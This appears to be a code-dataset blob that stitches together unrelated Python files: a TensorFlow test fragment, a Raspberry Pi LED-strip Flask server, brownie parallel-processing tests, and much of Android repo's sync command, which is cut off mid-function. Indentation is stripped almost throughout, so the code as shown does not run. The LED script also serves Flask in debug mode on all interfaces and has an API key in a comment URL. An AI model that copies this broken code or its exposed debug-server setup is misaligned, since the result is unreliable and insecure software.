# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
  assert graph.graph_def_versions.producer == producer_version
|
colorrise.py
|
#!/usr/bin/python
# Color-Rise
# (C) 2016 Mike Estee, MIT License
import time
from colour import Color
from flask import Flask, render_template, request
import threading
# https://github.com/jgarff/rpi_ws281x
import _rpi_ws281x as ws
import neopixel
# https://api.forecast.io/forecast/57fe5197b6b5632dbe542ff8c1cae6ba/37.8267,-122.423
import forecastio
api_key = "your_key_goes_here"
lat = 37.8267
lng = -122.423
# LED strip configuration:
LED_COUNT = 48 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (must support PWM!).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 5 # DMA channel to use for generating signal (try 5)
LED_BRIGHTNESS = 1 # Set to 0 for darkest and 1 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
# global settings for lighting strip
pixels = []
brightness = LED_BRIGHTNESS
strip = neopixel.Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA,
LED_INVERT, LED_BRIGHTNESS*200, 0, ws.WS2811_STRIP_GRB)
def sync_pixels():
strip.setBrightness(brightness*200)
n = 0
for c in pixels:
if isinstance(c, Color) and n<LED_COUNT:
strip.setPixelColorRGB(n, int(c.red*255), int(c.green*255), int(c.blue*255))
n += 1
strip.show()
# Background updating thread for pixels
class PixelThread(object):
def __init__(self, interval=500):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
# continuously update our colors forever
while True:
#sync_pixels()
time.sleep(self.interval/1000.0)
def map(index):
"""Translate index positions to pixel positions"""
index += 2 #first two are blocked
index = (LED_COUNT - index)-1 #invert rotation
index -= (LED_COUNT - 2) / 2
index = index + (LED_COUNT-2) if index < 2 else index # wrap
return index
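# Illustrative sketch (not part of the original script): with LED_COUNT = 48 the
# translation above skips the two blocked pixels, reverses the direction of travel
# and re-centers the ring, e.g. map(0) -> 22 and map(40) -> 28 after wrapping.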
def localHour():
hour = time.localtime().tm_hour
return hour
def isMorning():
hour = localHour()
if hour >= 6 and hour <= 9:
return True
else:
return False
def isBedtime():
hour = localHour()
if hour >= (12+8) or hour <= 5:
return True
else:
return False
# Main program logic follows:
app = Flask(__name__)
@app.route("/set", methods=['GET'])
def set_color():
global pixels
cstr = request.args['color']
try:
color = Color(cstr)
    except ValueError:
        print("unknown color: " + cstr)
return cstr, 200
for n in range(0,LED_COUNT):
pixels[n] = color
sync_pixels()
return cstr, 200
@app.errorhandler(404)
def not_found(error):
return render_template('error.html'), 404
@app.route("/")
def home():
templateData = {
'time': 'now'
}
return render_template('home.html', **templateData)
# main
if __name__ == '__main__':
# initial values for pixels
for n in range(0, LED_COUNT):
pixels.append( Color(hsl=(n/float(LED_COUNT),1,.5)) )
strip.begin()
sync_pixels()
# start update background thread
PixelThread()
# start the flask server
app.run(host='0.0.0.0', port=80, debug=True)
exit()
# start = time.clock() - 3600
# color = Color(255,255,255)
# colorMap = {
# "clear-day" : Color(255, 255, 102), # yellow
# "clear-night" : Color(0, 0, 102), # dark blue
# "rain" : Color(0, 153, 255), # light blue
# "snow" : Color(255,255,255), #white
# "sleet": Color(51, 102, 153), #dark gray blue
# "wind" : Color(102, 153, 153), # gray green
# "fog" : Color(204, 204, 204), #light gray
# "cloudy" : Color(64, 64, 64), #dark gray
# "partly-cloudy-day" : Color(128, 128, 100), #beige
# "partly-cloudy-night" : Color(117, 117, 163), # gray purple
# }
# # if key not in dic:
# while True:
# current = time.clock()
# if (current - start) > 3600:
# start = current
# forecast = forecastio.load_forecast(api_key, lat, lng)
# byHour = forecast.hourly()
# print "forecast for next 24 hours"
# for hour in byHour.data:
# print hour.icon + " " + str(hour.temperature)
# # dim the lights for bedtime
# brightness = LED_BRIGHTNESS
# if isBedtime():
# brightness = brightness/10
# strip.setBrightness(brightness)
# # set the forecast
# pixels = len(byHour.data) / strip.numPixels();
# #print "pixels:" + str(pixels)
# mightRain = False
# for i in range(0,len(byHour.data)):
# hour = byHour.data[i]
# # weather to color
# skyColor = Color(0,0,0)
# if hour.icon in colorMap:
# skyColor = colorMap[hour.icon]
# # will it rain today after 9am?
# if (i%24) > 9 and hour.precipProbability > 10:
# mightRain = True
# # temp
# temp = (hour.temperature - 30.) / 70.0
# tempColor = Color(int(255*temp),0,int(255*(1.0-temp)) )
# if mightRain and isMorning():
# skyColor = Color(0,128,255)
# for n in range(0,pixels):
# strip.setPixelColor(map(i*pixels + n), skyColor )
# strip.show()
# time.sleep(2)
|
parallel.py
|
# coding: utf-8
"""
brownie.tests.parallel
~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.parallel`.
:copyright: 2010 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import time
from threading import Thread
from attest import Tests, Assert, TestBase, test
from brownie.parallel import get_cpu_count, AsyncResult, TimeoutError
tests = Tests()
@tests.test
def test_get_cpu_count():
try:
Assert(get_cpu_count()) > 0
Assert(get_cpu_count()) == get_cpu_count()
except NotImplementedError:
# make sure default is returned if the number of processes cannot be
# determined
Assert(get_cpu_count(2)) == 2
class TestAsyncResult(TestBase):
@test
def wait(self):
aresult = AsyncResult()
def setter(aresult):
time.sleep(1)
aresult.set('foo')
t = Thread(target=setter, args=(aresult, ))
t.start()
with Assert.not_raising(TimeoutError):
aresult.wait(2)
@test
def get(self):
aresult = AsyncResult()
with Assert.raises(TimeoutError):
aresult.get(0.1)
def setter(aresult):
time.sleep(1)
aresult.set('foo')
t = Thread(target=setter, args=(aresult, ))
t.start()
with Assert.not_raising(TimeoutError):
Assert(aresult.get(2)) == 'foo'
aresult.set('foo')
Assert(aresult.get()) == 'foo'
aresult = AsyncResult()
aresult.set(ValueError(), success=False)
with Assert.raises(ValueError):
aresult.get()
@test
def callback_errback(self):
testruns = (['callback', True], ['errback', False])
for kwarg, success in testruns:
l = []
callback = lambda obj, l=l: l.append(obj)
aresult = AsyncResult(**{kwarg: callback})
assert not aresult.ready
aresult.set('foo', success=success)
Assert(len(l)) == 1
Assert(l[0]) == 'foo'
@test
def repr(self):
aresult = AsyncResult()
Assert(repr(aresult)) == 'AsyncResult()'
aresult = AsyncResult(callback=1)
Assert(repr(aresult)) == 'AsyncResult(callback=1)'
aresult = AsyncResult(errback=1)
Assert(repr(aresult)) == 'AsyncResult(errback=1)'
aresult = AsyncResult(callback=1, errback=2)
Assert(repr(aresult)) == 'AsyncResult(callback=1, errback=2)'
tests.register(TestAsyncResult)
|
sync.py
|
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import http.cookiejar as cookielib
import io
import json
import multiprocessing
import netrc
from optparse import SUPPRESS_HELP
import os
import re
import socket
import subprocess
import sys
import tempfile
import time
import urllib.error
import urllib.parse
import urllib.request
import xmlrpc.client
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
import resource
def _rlimit_nofile():
return resource.getrlimit(resource.RLIMIT_NOFILE)
except ImportError:
def _rlimit_nofile():
return (256, 256)
try:
import multiprocessing
except ImportError:
multiprocessing = None
import event_log
from git_command import GIT, git_require
from git_config import GetUrlCookieFile
from git_refs import R_HEADS, HEAD
import git_superproject
import gitc_utils
from project import Project
from project import RemoteSpec
from command import Command, MirrorSafeCommand, WORKER_BATCH_SIZE
from error import RepoChangedException, GitError, ManifestParseError
import platform_utils
from project import SyncBuffer
from progress import Progress
from wrapper import Wrapper
from manifest_xml import GitcManifest
_ONE_DAY_S = 24 * 60 * 60
class _FetchError(Exception):
"""Internal error thrown in _FetchHelper() when we don't want stack trace."""
class Sync(Command, MirrorSafeCommand):
jobs = 1
common = True
helpSummary = "Update working tree to the latest revision"
helpUsage = """
%prog [<project>...]
"""
helpDescription = """
The '%prog' command synchronizes local project directories
with the remote repositories specified in the manifest. If a local
project does not yet exist, it will clone a new local directory from
the remote repository and set up tracking branches as specified in
the manifest. If the local project already exists, '%prog'
will update the remote branches and rebase any new local changes
on top of the new remote changes.
'%prog' will synchronize all projects listed at the command
line. Projects can be specified either by name, or by a relative
or absolute path to the project's local directory. If no projects
are specified, '%prog' will synchronize all projects listed in
the manifest.
The -d/--detach option can be used to switch specified projects
back to the manifest revision. This option is especially helpful
if the project is currently on a topic branch, but the manifest
revision is temporarily needed.
The -s/--smart-sync option can be used to sync to a known good
build as specified by the manifest-server element in the current
manifest. The -t/--smart-tag option is similar and allows you to
specify a custom tag/label.
The -u/--manifest-server-username and -p/--manifest-server-password
options can be used to specify a username and password to authenticate
with the manifest server when using the -s or -t option.
If -u and -p are not specified when using the -s or -t option, '%prog'
will attempt to read authentication credentials for the manifest server
from the user's .netrc file.
'%prog' will not use authentication credentials from -u/-p or .netrc
if the manifest server specified in the manifest file already includes
credentials.
By default, all projects will be synced. The --fail-fast option can be used
to halt syncing as soon as possible when the first project fails to sync.
The --force-sync option can be used to overwrite existing git
directories if they have previously been linked to a different
object directory. WARNING: This may cause data to be lost since
refs may be removed when overwriting.
The --force-remove-dirty option can be used to remove previously used
projects with uncommitted changes. WARNING: This may cause data to be
lost since uncommitted changes may be removed with projects that no longer
exist in the manifest.
The --no-clone-bundle option disables any attempt to use
$URL/clone.bundle to bootstrap a new Git repository from a
resumable bundle file on a content delivery network. This
may be necessary if there are problems with the local Python
HTTP client or proxy configuration, but the Git binary works.
The --fetch-submodules option enables fetching Git submodules
of a project from server.
The -c/--current-branch option can be used to only fetch objects that
are on the branch specified by a project's revision.
The --optimized-fetch option can be used to only fetch projects that
are fixed to a sha1 revision if the sha1 revision does not already
exist locally.
The --prune option can be used to remove any refs that no longer
exist on the remote.
# SSH Connections
If at least one project remote URL uses an SSH connection (ssh://,
git+ssh://, or user@host:path syntax) repo will automatically
enable the SSH ControlMaster option when connecting to that host.
This feature permits other projects in the same '%prog' session to
reuse the same SSH tunnel, saving connection setup overheads.
To disable this behavior on UNIX platforms, set the GIT_SSH
environment variable to 'ssh'. For example:
export GIT_SSH=ssh
%prog
# Compatibility
This feature is automatically disabled on Windows, due to the lack
of UNIX domain socket support.
This feature is not compatible with url.insteadof rewrites in the
user's ~/.gitconfig. '%prog' is currently not able to perform the
rewrite early enough to establish the ControlMaster tunnel.
If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or
later is required to fix a server side protocol bug.
"""
PARALLEL_JOBS = 1
def _Options(self, p, show_smart=True):
try:
self.PARALLEL_JOBS = self.manifest.default.sync_j
except ManifestParseError:
pass
super()._Options(p)
p.add_option('-f', '--force-broken',
dest='force_broken', action='store_true',
help='obsolete option (to be deleted in the future)')
p.add_option('--fail-fast',
dest='fail_fast', action='store_true',
help='stop syncing after first error is hit')
p.add_option('--force-sync',
dest='force_sync', action='store_true',
help="overwrite an existing git directory if it needs to "
"point to a different object directory. WARNING: this "
"may cause loss of data")
p.add_option('--force-remove-dirty',
dest='force_remove_dirty', action='store_true',
help="force remove projects with uncommitted modifications if "
"projects no longer exist in the manifest. "
"WARNING: this may cause loss of data")
p.add_option('-l', '--local-only',
dest='local_only', action='store_true',
help="only update working tree, don't fetch")
p.add_option('--no-manifest-update', '--nmu',
dest='mp_update', action='store_false', default='true',
help='use the existing manifest checkout as-is. '
'(do not update to the latest revision)')
p.add_option('-n', '--network-only',
dest='network_only', action='store_true',
help="fetch only, don't update working tree")
p.add_option('-d', '--detach',
dest='detach_head', action='store_true',
help='detach projects back to manifest revision')
p.add_option('-c', '--current-branch',
dest='current_branch_only', action='store_true',
help='fetch only current branch from server')
p.add_option('-v', '--verbose',
dest='output_mode', action='store_true',
help='show all sync output')
p.add_option('-q', '--quiet',
dest='output_mode', action='store_false',
help='only show errors')
p.add_option('-m', '--manifest-name',
dest='manifest_name',
help='temporary manifest to use for this sync', metavar='NAME.xml')
p.add_option('--clone-bundle', action='store_true',
help='enable use of /clone.bundle on HTTP/HTTPS')
p.add_option('--no-clone-bundle', dest='clone_bundle', action='store_false',
help='disable use of /clone.bundle on HTTP/HTTPS')
p.add_option('-u', '--manifest-server-username', action='store',
dest='manifest_server_username',
help='username to authenticate with the manifest server')
p.add_option('-p', '--manifest-server-password', action='store',
dest='manifest_server_password',
help='password to authenticate with the manifest server')
p.add_option('--fetch-submodules',
dest='fetch_submodules', action='store_true',
help='fetch submodules from server')
p.add_option('--use-superproject', action='store_true',
help='use the manifest superproject to sync projects')
p.add_option('--no-tags',
dest='tags', default=True, action='store_false',
help="don't fetch tags")
p.add_option('--optimized-fetch',
dest='optimized_fetch', action='store_true',
help='only fetch projects fixed to sha1 if revision does not exist locally')
p.add_option('--retry-fetches',
default=0, action='store', type='int',
help='number of times to retry fetches on transient errors')
p.add_option('--prune', dest='prune', action='store_true',
help='delete refs that no longer exist on the remote')
if show_smart:
p.add_option('-s', '--smart-sync',
dest='smart_sync', action='store_true',
help='smart sync using manifest from the latest known good build')
p.add_option('-t', '--smart-tag',
dest='smart_tag', action='store',
help='smart sync using manifest from a known tag')
g = p.add_option_group('repo Version options')
g.add_option('--no-repo-verify',
dest='repo_verify', default=True, action='store_false',
help='do not verify repo source code')
g.add_option('--repo-upgraded',
dest='repo_upgraded', action='store_true',
help=SUPPRESS_HELP)
def _GetBranch(self):
"""Returns the branch name for getting the approved manifest."""
p = self.manifest.manifestProject
b = p.GetBranch(p.CurrentBranch)
branch = b.merge
if branch.startswith(R_HEADS):
branch = branch[len(R_HEADS):]
return branch
def _UpdateProjectsRevisionId(self, opt, args):
"""Update revisionId of every project with the SHA from superproject.
This function updates each project's revisionId with SHA from superproject.
It writes the updated manifest into a file and reloads the manifest from it.
Args:
opt: Program options returned from optparse. See _Options().
args: Arguments to pass to GetProjects. See the GetProjects
docstring for details.
Returns:
Returns path to the overriding manifest file.
"""
superproject = git_superproject.Superproject(self.manifest,
self.repodir,
quiet=opt.quiet)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
manifest_path = superproject.UpdateProjectsRevisionId(all_projects)
if not manifest_path:
      print('error: Update of revisionId from superproject has failed',
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_path)
return manifest_path
def _FetchProjectList(self, opt, projects, sem, *args, **kwargs):
"""Main function of the fetch threads.
Delegates most of the work to _FetchHelper.
Args:
opt: Program options returned from optparse. See _Options().
projects: Projects to fetch.
sem: We'll release() this semaphore when we exit so that another thread
can be started up.
*args, **kwargs: Remaining arguments to pass to _FetchHelper. See the
_FetchHelper docstring for details.
"""
try:
for project in projects:
success = self._FetchHelper(opt, project, *args, **kwargs)
if not success and opt.fail_fast:
break
finally:
sem.release()
def _FetchHelper(self, opt, project, lock, fetched, pm, err_event,
clone_filter):
"""Fetch git objects for a single project.
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to fetch.
lock: Lock for accessing objects that are shared amongst multiple
_FetchHelper() threads.
fetched: set object that we will add project.gitdir to when we're done
(with our lock held).
pm: Instance of a Project object. We will call pm.update() (with our
lock held).
err_event: We'll set this event in the case of an error (after printing
out info about the error).
clone_filter: Filter for use in a partial clone.
Returns:
Whether the fetch was successful.
"""
    # We'll set this to true once we've locked the lock.
did_lock = False
# Encapsulate everything in a try/except/finally so that:
# - We always set err_event in the case of an exception.
# - We always make sure we unlock the lock if we locked it.
start = time.time()
success = False
buf = io.StringIO()
with lock:
pm.start(project.name)
try:
try:
success = project.Sync_NetworkHalf(
quiet=opt.quiet,
verbose=opt.verbose,
output_redir=buf,
current_branch_only=opt.current_branch_only,
force_sync=opt.force_sync,
clone_bundle=opt.clone_bundle,
tags=opt.tags, archive=self.manifest.IsArchive,
optimized_fetch=opt.optimized_fetch,
retry_fetches=opt.retry_fetches,
prune=opt.prune,
clone_filter=clone_filter)
self._fetch_times.Set(project, time.time() - start)
# Lock around all the rest of the code, since printing, updating a set
# and Progress.update() are not thread safe.
lock.acquire()
did_lock = True
output = buf.getvalue()
if opt.verbose and output:
pm.update(inc=0, msg=output.rstrip())
if not success:
err_event.set()
print('error: Cannot fetch %s from %s'
% (project.name, project.remote.url),
file=sys.stderr)
if opt.fail_fast:
raise _FetchError()
fetched.add(project.gitdir)
except _FetchError:
pass
except Exception as e:
print('error: Cannot fetch %s (%s: %s)'
% (project.name, type(e).__name__, str(e)), file=sys.stderr)
err_event.set()
raise
finally:
if not did_lock:
lock.acquire()
pm.finish(project.name)
lock.release()
finish = time.time()
self.event_log.AddSync(project, event_log.TASK_SYNC_NETWORK,
start, finish, success)
return success
def _Fetch(self, projects, opt, err_event):
fetched = set()
lock = _threading.Lock()
pm = Progress('Fetching', len(projects))
objdir_project_map = dict()
for project in projects:
objdir_project_map.setdefault(project.objdir, []).append(project)
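# Note (a sketch of the intent, not upstream documentation): projects that share
# an objdir are grouped so that a single worker fetches them sequentially and two
# fetches never write into the same object store at once. Hypothetical example:
#   objdir_project_map = {
#     '.repo/project-objects/platform/foo.git': [<Project foo>, <Project foo-vendor>],
#     '.repo/project-objects/platform/bar.git': [<Project bar>],
#   }
# Each value list becomes one unit of work gated by the semaphore below.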
threads = set()
sem = _threading.Semaphore(self.jobs)
for project_list in objdir_project_map.values():
# Check for any errors before running any more tasks.
# ...we'll let existing threads finish, though.
if err_event.is_set() and opt.fail_fast:
break
sem.acquire()
kwargs = dict(opt=opt,
projects=project_list,
sem=sem,
lock=lock,
fetched=fetched,
pm=pm,
err_event=err_event,
clone_filter=self.manifest.CloneFilter)
if self.jobs > 1:
t = _threading.Thread(target=self._FetchProjectList,
kwargs=kwargs)
# Ensure that Ctrl-C will not freeze the repo process.
t.daemon = True
threads.add(t)
t.start()
else:
self._FetchProjectList(**kwargs)
for t in threads:
t.join()
pm.end()
self._fetch_times.Save()
if not self.manifest.IsArchive:
self._GCProjects(projects, opt, err_event)
return fetched
def _CheckoutOne(self, opt, project):
"""Checkout work tree for one project
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to checkout.
Returns:
Whether the fetch was successful.
"""
start = time.time()
syncbuf = SyncBuffer(self.manifest.manifestProject.config,
detach_head=opt.detach_head)
success = False
try:
project.Sync_LocalHalf(syncbuf, force_sync=opt.force_sync)
success = syncbuf.Finish()
except Exception as e:
print('error: Cannot checkout %s: %s: %s' %
(project.name, type(e).__name__, str(e)),
file=sys.stderr)
raise
if not success:
print('error: Cannot checkout %s' % (project.name), file=sys.stderr)
finish = time.time()
return (success, project, start, finish)
def _Checkout(self, all_projects, opt, err_results):
"""Checkout projects listed in all_projects
Args:
all_projects: List of all projects that should be checked out.
opt: Program options returned from optparse. See _Options().
err_results: A list of strings, paths to git repos where checkout failed.
"""
ret = True
# Only checkout projects with worktrees.
all_projects = [x for x in all_projects if x.worktree]
pm = Progress('Checking out', len(all_projects))
def _ProcessResults(results):
for (success, project, start, finish) in results:
self.event_log.AddSync(project, event_log.TASK_SYNC_LOCAL,
start, finish, success)
# Check for any errors before running any more tasks.
# ...we'll let existing threads finish, though.
if not success:
err_results.append(project.relpath)
if opt.fail_fast:
return False
pm.update(msg=project.name)
return True
# NB: Multiprocessing is heavy, so don't spin it up for one job.
if len(all_projects) == 1 or opt.jobs == 1:
if not _ProcessResults(self._CheckoutOne(opt, x) for x in all_projects):
ret = False
else:
with multiprocessing.Pool(opt.jobs) as pool:
results = pool.imap_unordered(
functools.partial(self._CheckoutOne, opt),
all_projects,
chunksize=WORKER_BATCH_SIZE)
if not _ProcessResults(results):
ret = False
pool.close()
pm.end()
return ret and not err_results
def _GCProjects(self, projects, opt, err_event):
gc_gitdirs = {}
for project in projects:
# Make sure pruning never kicks in with shared projects.
if (not project.use_git_worktrees and
len(project.manifest.GetProjectsWithName(project.name)) > 1):
if not opt.quiet:
print('%s: Shared project %s found, disabling pruning.' %
(project.relpath, project.name))
if git_require((2, 7, 0)):
project.EnableRepositoryExtension('preciousObjects')
else:
# This isn't perfect, but it's the best we can do with old git.
print('%s: WARNING: shared projects are unreliable when using old '
'versions of git; please upgrade to git-2.7.0+.'
% (project.relpath,),
file=sys.stderr)
project.config.SetString('gc.pruneExpire', 'never')
gc_gitdirs[project.gitdir] = project.bare_git
if multiprocessing:
cpu_count = multiprocessing.cpu_count()
else:
cpu_count = 1
jobs = min(self.jobs, cpu_count)
if jobs < 2:
for bare_git in gc_gitdirs.values():
bare_git.gc('--auto')
return
config = {'pack.threads': cpu_count // jobs if cpu_count > jobs else 1}
threads = set()
sem = _threading.Semaphore(jobs)
def GC(bare_git):
try:
try:
bare_git.gc('--auto', config=config)
except GitError:
err_event.set()
except Exception:
err_event.set()
raise
finally:
sem.release()
for bare_git in gc_gitdirs.values():
if err_event.is_set() and opt.fail_fast:
break
sem.acquire()
t = _threading.Thread(target=GC, args=(bare_git,))
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
def _ReloadManifest(self, manifest_name=None):
if manifest_name:
# Override calls _Unload already
self.manifest.Override(manifest_name)
else:
self.manifest._Unload()
def UpdateProjectList(self, opt):
new_project_paths = []
for project in self.GetProjects(None, missing_ok=True):
if project.relpath:
new_project_paths.append(project.relpath)
file_name = 'project.list'
file_path = os.path.join(self.repodir, file_name)
old_project_paths = []
if os.path.exists(file_path):
with open(file_path, 'r') as fd:
old_project_paths = fd.read().split('\n')
# In reversed order, so subfolders are deleted before parent folder.
for path in sorted(old_project_paths, reverse=True):
if not path:
continue
if path not in new_project_paths:
# If the path has already been deleted, we don't need to do it
gitdir = os.path.join(self.manifest.topdir, path, '.git')
if os.path.exists(gitdir):
project = Project(
manifest=self.manifest,
name=path,
remote=RemoteSpec('origin'),
gitdir=gitdir,
objdir=gitdir,
use_git_worktrees=os.path.isfile(gitdir),
worktree=os.path.join(self.manifest.topdir, path),
relpath=path,
revisionExpr='HEAD',
revisionId=None,
groups=None)
if not project.DeleteWorktree(
quiet=opt.quiet,
force=opt.force_remove_dirty):
return 1
new_project_paths.sort()
with open(file_path, 'w') as fd:
fd.write('\n'.join(new_project_paths))
fd.write('\n')
return 0
def _SmartSyncSetup(self, opt, smart_sync_manifest_path):
if not self.manifest.manifest_server:
print('error: cannot smart sync: no manifest server defined in '
'manifest', file=sys.stderr)
sys.exit(1)
manifest_server = self.manifest.manifest_server
if not opt.quiet:
print('Using manifest server %s' % manifest_server)
if '@' not in manifest_server:
username = None
password = None
if opt.manifest_server_username and opt.manifest_server_password:
username = opt.manifest_server_username
password = opt.manifest_server_password
else:
try:
info = netrc.netrc()
except IOError:
# .netrc file does not exist or could not be opened
pass
else:
try:
parse_result = urllib.parse.urlparse(manifest_server)
if parse_result.hostname:
auth = info.authenticators(parse_result.hostname)
if auth:
username, _account, password = auth
else:
print('No credentials found for %s in .netrc'
% parse_result.hostname, file=sys.stderr)
except netrc.NetrcParseError as e:
print('Error parsing .netrc file: %s' % e, file=sys.stderr)
if (username and password):
manifest_server = manifest_server.replace('://', '://%s:%s@' %
(username, password),
1)
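# Illustration of the rewrite above (hypothetical values): a manifest server of
# 'https://example.com/manifest-server' with username 'alice' and password 's3cret'
# becomes 'https://alice:s3cret@example.com/manifest-server'; only the first
# '://' is replaced, which is why the count argument to replace() is 1.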
transport = PersistentTransport(manifest_server)
if manifest_server.startswith('persistent-'):
manifest_server = manifest_server[len('persistent-'):]
try:
server = xmlrpc.client.Server(manifest_server, transport=transport)
if opt.smart_sync:
branch = self._GetBranch()
if 'SYNC_TARGET' in os.environ:
target = os.environ['SYNC_TARGET']
[success, manifest_str] = server.GetApprovedManifest(branch, target)
elif ('TARGET_PRODUCT' in os.environ and
'TARGET_BUILD_VARIANT' in os.environ):
target = '%s-%s' % (os.environ['TARGET_PRODUCT'],
os.environ['TARGET_BUILD_VARIANT'])
[success, manifest_str] = server.GetApprovedManifest(branch, target)
else:
[success, manifest_str] = server.GetApprovedManifest(branch)
else:
assert(opt.smart_tag)
[success, manifest_str] = server.GetManifest(opt.smart_tag)
if success:
manifest_name = os.path.basename(smart_sync_manifest_path)
try:
with open(smart_sync_manifest_path, 'w') as f:
f.write(manifest_str)
except IOError as e:
print('error: cannot write manifest to %s:\n%s'
% (smart_sync_manifest_path, e),
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_name)
else:
print('error: manifest server RPC call failed: %s' %
manifest_str, file=sys.stderr)
sys.exit(1)
except (socket.error, IOError, xmlrpc.client.Fault) as e:
print('error: cannot connect to manifest server %s:\n%s'
% (self.manifest.manifest_server, e), file=sys.stderr)
sys.exit(1)
except xmlrpc.client.ProtocolError as e:
print('error: cannot connect to manifest server %s:\n%d %s'
% (self.manifest.manifest_server, e.errcode, e.errmsg),
file=sys.stderr)
sys.exit(1)
return manifest_name
def _UpdateManifestProject(self, opt, mp, manifest_name):
"""Fetch & update the local manifest project."""
if not opt.local_only:
start = time.time()
success = mp.Sync_NetworkHalf(quiet=opt.quiet, verbose=opt.verbose,
current_branch_only=opt.current_branch_only,
force_sync=opt.force_sync,
tags=opt.tags,
optimized_fetch=opt.optimized_fetch,
retry_fetches=opt.retry_fetches,
submodules=self.manifest.HasSubmodules,
clone_filter=self.manifest.CloneFilter)
finish = time.time()
self.event_log.AddSync(mp, event_log.TASK_SYNC_NETWORK,
start, finish, success)
if mp.HasChanges:
syncbuf = SyncBuffer(mp.config)
start = time.time()
mp.Sync_LocalHalf(syncbuf, submodules=self.manifest.HasSubmodules)
clean = syncbuf.Finish()
self.event_log.AddSync(mp, event_log.TASK_SYNC_LOCAL,
start, time.time(), clean)
if not clean:
sys.exit(1)
self._ReloadManifest(opt.manifest_name)
if opt.jobs is None:
self.jobs = self.manifest.default.sync_j
def ValidateOptions(self, opt, args):
if opt.force_broken:
print('warning: -f/--force-broken is now the default behavior, and the '
'options are deprecated', file=sys.stderr)
if opt.network_only and opt.detach_head:
self.OptionParser.error('cannot combine -n and -d')
if opt.network_only and opt.local_only:
self.OptionParser.error('cannot combine -n and -l')
if opt.manifest_name and opt.smart_sync:
self.OptionParser.error('cannot combine -m and -s')
if opt.manifest_name and opt.smart_tag:
self.OptionParser.error('cannot combine -m and -t')
if opt.manifest_server_username or opt.manifest_server_password:
if not (opt.smart_sync or opt.smart_tag):
self.OptionParser.error('-u and -p may only be combined with -s or -t')
if None in [opt.manifest_server_username, opt.manifest_server_password]:
self.OptionParser.error('both -u and -p must be given')
def Execute(self, opt, args):
if opt.jobs:
self.jobs = opt.jobs
if self.jobs > 1:
soft_limit, _ = _rlimit_nofile()
self.jobs = min(self.jobs, (soft_limit - 5) // 3)
opt.quiet = opt.output_mode is False
opt.verbose = opt.output_mode is True
if opt.manifest_name:
self.manifest.Override(opt.manifest_name)
manifest_name = opt.manifest_name
smart_sync_manifest_path = os.path.join(
self.manifest.manifestProject.worktree, 'smart_sync_override.xml')
if opt.clone_bundle is None:
opt.clone_bundle = self.manifest.CloneBundle
if opt.smart_sync or opt.smart_tag:
manifest_name = self._SmartSyncSetup(opt, smart_sync_manifest_path)
else:
if os.path.isfile(smart_sync_manifest_path):
try:
platform_utils.remove(smart_sync_manifest_path)
except OSError as e:
print('error: failed to remove existing smart sync override manifest: %s' %
e, file=sys.stderr)
err_event = _threading.Event()
rp = self.manifest.repoProject
rp.PreSync()
cb = rp.CurrentBranch
if cb:
base = rp.GetBranch(cb).merge
if not base or not base.startswith('refs/heads/'):
print('warning: repo is not tracking a remote branch, so it will not '
'receive updates; run `repo init --repo-rev=stable` to fix.',
file=sys.stderr)
mp = self.manifest.manifestProject
mp.PreSync()
if opt.repo_upgraded:
_PostRepoUpgrade(self.manifest, quiet=opt.quiet)
if not opt.mp_update:
print('Skipping update of local manifest project.')
else:
self._UpdateManifestProject(opt, mp, manifest_name)
if (opt.use_superproject or
self.manifest.manifestProject.config.GetBoolean(
'repo.superproject')):
manifest_name = self._UpdateProjectsRevisionId(opt, args)
if self.gitc_manifest:
gitc_manifest_projects = self.GetProjects(args,
missing_ok=True)
gitc_projects = []
opened_projects = []
for project in gitc_manifest_projects:
if project.relpath in self.gitc_manifest.paths and \
self.gitc_manifest.paths[project.relpath].old_revision:
opened_projects.append(project.relpath)
else:
gitc_projects.append(project.relpath)
if not args:
gitc_projects = None
if gitc_projects != [] and not opt.local_only:
print('Updating GITC client: %s' % self.gitc_manifest.gitc_client_name)
manifest = GitcManifest(self.repodir, self.gitc_manifest.gitc_client_name)
if manifest_name:
manifest.Override(manifest_name)
else:
manifest.Override(self.manifest.manifestFile)
gitc_utils.generate_gitc_manifest(self.gitc_manifest,
manifest,
gitc_projects)
print('GITC client successfully synced.')
# The opened projects need to be synced as normal, therefore we
# generate a new args list to represent the opened projects.
# TODO: make this more reliable -- if there's a project name/path overlap,
# this may choose the wrong project.
args = [os.path.relpath(self.manifest.paths[path].worktree, os.getcwd())
for path in opened_projects]
if not args:
return
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
err_network_sync = False
err_update_projects = False
self._fetch_times = _FetchTimes(self.manifest)
if not opt.local_only:
to_fetch = []
now = time.time()
if _ONE_DAY_S <= (now - rp.LastFetch):
to_fetch.append(rp)
to_fetch.extend(all_projects)
to_fetch.sort(key=self._fetch_times.Get, reverse=True)
fetched = self._Fetch(to_fetch, opt, err_event)
_PostRepoFetch(rp, opt.repo_verify)
if opt.network_only:
# bail out now; the rest touches the working tree
if err_event.is_set():
